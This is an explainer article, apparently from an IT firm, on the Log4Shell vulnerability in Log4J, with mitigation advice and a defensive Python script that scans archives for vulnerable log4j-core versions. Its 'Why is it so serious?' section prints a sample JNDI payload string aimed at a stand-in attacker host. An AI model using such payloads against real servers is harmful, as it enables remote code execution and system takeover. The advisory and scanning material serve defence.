One of the most dangerous security breaches the digital world has seen is currently unfolding, sending everyone from governmental agencies to cybersecurity experts scrambling to patch the hole. It stems from a critical software vulnerability, tracked as CVE-2021-44228, in Log4J, a Java-based logging library reportedly used in nearly a third of all web servers in the world. Also known as “Log4Shell”, the vulnerability came to wide public attention through the sandbox video game Minecraft and has since been rated 10.0 out of 10 on the CVSS severity scale, the highest rating the scale allows. “This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious,” said Jen Easterly, Director of the US Cybersecurity and Infrastructure Security Agency (CISA). Companies and governmental agencies have been advised to take immediate steps to mitigate potentially catastrophic damage. But why is a vulnerability in Log4J, a term most casual computer users are unlikely to have heard, so serious, and what should you do? Here is what we know so far.
What is Log4J and who uses it?

Log4J (formally Apache Log4j 2) is an open-source logging library that lets software developers record and monitor what is happening inside their applications and online services. This is called logging, and it creates a running journal of system and user activity that developers use to diagnose problems or track data within their programs. Logging can record, and in some cases respond to, everything from error messages to user data to system status. Because it is free to use and can be added to a Java project as a single dependency, Log4J is one of the most widely deployed pieces of software in the world. It is found in web applications, cloud services, and email systems. It is used in services and software run by tech giants like Apple, Amazon, and Google. It is even embedded in everything from hospital devices to car navigation systems to software run by governmental agencies.
Why is it so serious?

The vulnerability lets an attacker run code of their choosing on a server merely by getting that server to log a string the attacker controls; no password or account is needed. Vulnerable versions of Log4J expand “lookup” expressions embedded in the text they log, and one of those lookups, JNDI, fetches an object from whatever remote LDAP or RMI server the expression names. A string such as ${jndi:ldap://attacker.example/x} submitted in any field that ends up in a log, a username, a web request’s User-Agent header, a chat message, is enough to make the server reach out to the attacker and execute what it is handed. Unlike many high-level security threats, Log4Shell is exceptionally easy to exploit: some attackers have already found success simply by pasting such strings into Minecraft chat boxes. According to a statement from CISA on December 10, 2021, this means that “any remote attacker could exploit this vulnerability to take control of an entire affected system.” One of the most serious threats is that foreign hackers could infiltrate critical U.S. infrastructure such as power, water, energy, and communications systems, though cybersecurity researchers believe everything from company databases to consumer electronics is also at risk. The ubiquity of Log4J also makes the vulnerability particularly difficult to address. While companies and organizations that use the logging utility directly can apply patches easily, the library is often embedded inside third-party applications and appliances that only their vendor can update, so hundreds of millions of devices are running the vulnerable code with their owners none the wiser. In the meantime, attackers are making millions of exploitation attempts every day.
How are companies responding?

Security teams across the world have worked day and night to roll out updates that fix the problem. Many major companies, Microsoft and IBM among them, have already made internal fixes and released patches for consumers to download to their own devices. While individuals are encouraged to protect themselves by applying updates as they are released, companies bear more responsibility. According to the Federal Trade Commission, companies are legally obligated to take reasonable steps to mitigate financial and data losses caused by known vulnerabilities. “It is critical that companies and their vendors relying on Log4J act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action,” the agency said on January 4, 2022. “The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.”
What should companies do?

The Cybersecurity and Infrastructure Security Agency (CISA) has published guidance to help companies determine whether they are running a vulnerable version of Log4J (Log4j 2 versions 2.0-beta9 through 2.14.1). Apache’s fix first shipped in 2.15.0, and later releases addressed further lookup-related problems, so the target should be the current release rather than 2.15.0 itself. Finding the library is the hard part: it is rarely installed on its own and is usually bundled inside other vendors’ .jar, .war and .ear files, so an inventory has to look inside those archives. If you are using Log4J, immediately update to the latest version; where a vendor update is not yet available, remove the JndiLookup class from the log4j-core jar, the mitigation Apache documented for deployments that cannot be upgraded right away. Also inform any relevant third-party organizations (such as your managed service provider) about the risk. Additional steps to mitigate damage can be found on the CISA website.
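The version check above is simple to state but awkward to apply, because log4j-core is usually buried inside other archives. The Python inventory script below is an added example, not code from the article, CISA or Apache. The jars it builds are constructed stand-ins so it can run offline; its version logic encodes the range given above (2.0-beta9 through 2.14.1) plus the backported 2.12.2 (Java 7) and 2.3.1 (Java 6) fix releases, a detail the text does not cover; and it reports a jar from which JndiLookup.class has been removed as mitigated rather than vulnerable.

```python
"""Inventory Log4j 2 inside .jar/.war/.ear files and flag CVE-2021-44228.

Nested archives are opened in memory because fat jars and web applications
bundle log4j-core several levels deep.
"""
import io
import os
import re
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")
FIRST_VULNERABLE, LAST_VULNERABLE = "2.0-beta9", "2.14.1"


def parse_version(ver):
    """'2.0-beta9' / '2.0-rc1' / '2.14.1' -> sortable tuple.
    Pre-release rank beta=0, rc=1, final=2 keeps 2.0-beta9 < 2.0-rc1 < 2.0."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?", ver)
    if not m:
        raise ValueError(f"unrecognised Log4j version: {ver!r}")
    major, minor, patch, tag, n = m.groups()
    rank = {"beta": 0, "rc": 1, None: 2}[tag]
    return (int(major), int(minor), int(patch or 0), rank, int(n or 0))


def is_log4shell_vulnerable(ver):
    """True if this log4j-core version is in the CVE-2021-44228 range."""
    v = parse_version(ver)
    if v[0] != 2:
        return False                       # Log4j 1.x is not affected by this CVE
    # Backported fix releases for older Java runtimes: 2.12.2 and 2.3.1
    if v[:2] == (2, 12) and v >= parse_version("2.12.2"):
        return False
    if v[:2] == (2, 3) and v >= parse_version("2.3.1"):
        return False
    return parse_version(FIRST_VULNERABLE) <= v <= parse_version(LAST_VULNERABLE)


def verdict(version, jndi_class_present):
    if version is None:
        return "UNKNOWN-VERSION" if jndi_class_present else "OK"
    try:
        vulnerable = is_log4shell_vulnerable(version)
    except ValueError:
        return "UNKNOWN-VERSION"
    if not vulnerable:
        return "OK"                        # still check the later Log4j advisories
    return "VULNERABLE" if jndi_class_present else "MITIGATED"


def inspect_archive(blob, path="<archive>", depth=0, findings=None):
    """Record any log4j-core in the archive bytes, recursing into nested
    archives up to three levels deep."""
    if findings is None:
        findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return findings
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    jndi_present = JNDI_CLASS in names
    if version is not None or jndi_present:
        findings.append({"path": path, "version": version,
                         "jndi_lookup_present": jndi_present,
                         "verdict": verdict(version, jndi_present)})
    if depth < 3:
        for inner in sorted(names):
            if inner.endswith(ARCHIVE_SUFFIXES):
                inspect_archive(zf.read(inner), f"{path}!{inner}", depth + 1, findings)
    return findings


def scan_tree(root):
    """Walk a directory tree and inspect every archive in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    inspect_archive(fh.read(), full, 0, findings)
    return findings


def build_fake_archive(entries):
    """Constructed zip bytes from {entry_name: bytes}; a stand-in for real jars."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def fake_log4j_core(version, keep_jndi_class=True):
    entries = {POM_PROPS: f"version={version}\nartifactId=log4j-core\n".encode()}
    if keep_jndi_class:
        entries[JNDI_CLASS] = b"\xca\xfe\xba\xbe"   # placeholder class bytes
    return build_fake_archive(entries)


if __name__ == "__main__":
    fat_jar = build_fake_archive({
        "BOOT-INF/lib/log4j-core-2.14.1.jar": fake_log4j_core("2.14.1"),
        "BOOT-INF/lib/other.jar": build_fake_archive({"x.class": b""}),
    })
    for finding in inspect_archive(fat_jar, "app.jar"):
        print(finding)
```

On a real host, call scan_tree on the application roots (for example the directories holding deployed .war files or service jars) and review every finding whose verdict is not OK; a finding of OK only covers CVE-2021-44228, so anything below the current release should still be scheduled for an update.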
Phillip Long – CISSP, CEO of BIS Technology Group, along with his team of marketing and information technology experts, will walk you through an overview of what your business should be doing to protect your data and plan your digital marketing strategies.